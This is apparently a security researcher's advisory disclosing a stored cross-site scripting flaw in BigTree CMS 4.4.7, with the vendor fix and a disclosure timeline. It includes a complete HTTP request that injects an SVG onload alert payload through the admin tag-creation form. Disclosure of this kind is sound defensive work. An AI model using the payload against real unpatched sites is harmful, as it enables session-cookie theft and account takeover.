BigTree CMS - XSS Vulnerability in Version 4.4.7 • Edric Teo

BigTree CMS – XSS Vulnerability in Version 4.4.7

April 2020

BigTree CMS – XSS Vulnerability in Version 4.4.7

Product Information:

Software: BigTree CMS

Tested Version: 4.4.7, released 16.10.2019

Vulnerability Type: Cross-Site Scripting (CWE-79)

Description: BigTree is an extremely extensible open-source CMS built on PHP and MySQL. (excerpt copied from https://www.bigtreecms.org/)

The following is a POST request to create a tag with the payload:

POST /admin/tags/create/ HTTP/1.1
Host: demo.bigtreecms.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
Origin: https://demo.bigtreecms.org
Connection: close
Referer: https://demo.bigtreecms.org/admin/tags/add/
Cookie: PHPSESSID=giqced7qd6sqkrb6i2tdndbvl1; bigtree_admin[page_properties_open]=on;
bigtree_admin[email][email protected];
bigtree_admin[login]=["session-5e419446c4d265.05914498","chain-5e419446c4c097.13460452"]
Upgrade-Insecure-Requests: 1

tag="><svg/onload=alert(/xss/)/>

Impact:

A user with tag-adding capability is able to steal the cookie of another user with higher privilege.

Solution:

Update to Bigtree CMS version 4.4.9.

Timeline:

Vulnerability found: 11.02.2020

The vendor informed: 11.02.2020

Vendor responded: 13.02.2020

Bug fixed: 28.02.2020

Version 4.4.9 released: 06.03.2020

Public Advisory: 06.04.2020

References:

https://github.com/bigtreecms/BigTree-CMS/commit/7a588580958c74dbb820991d37d7b3c8f0843668

https://github.com/bigtreecms/BigTree-CMS/commit/c34c2a7623d153549e63188eadf7ff40200b8b11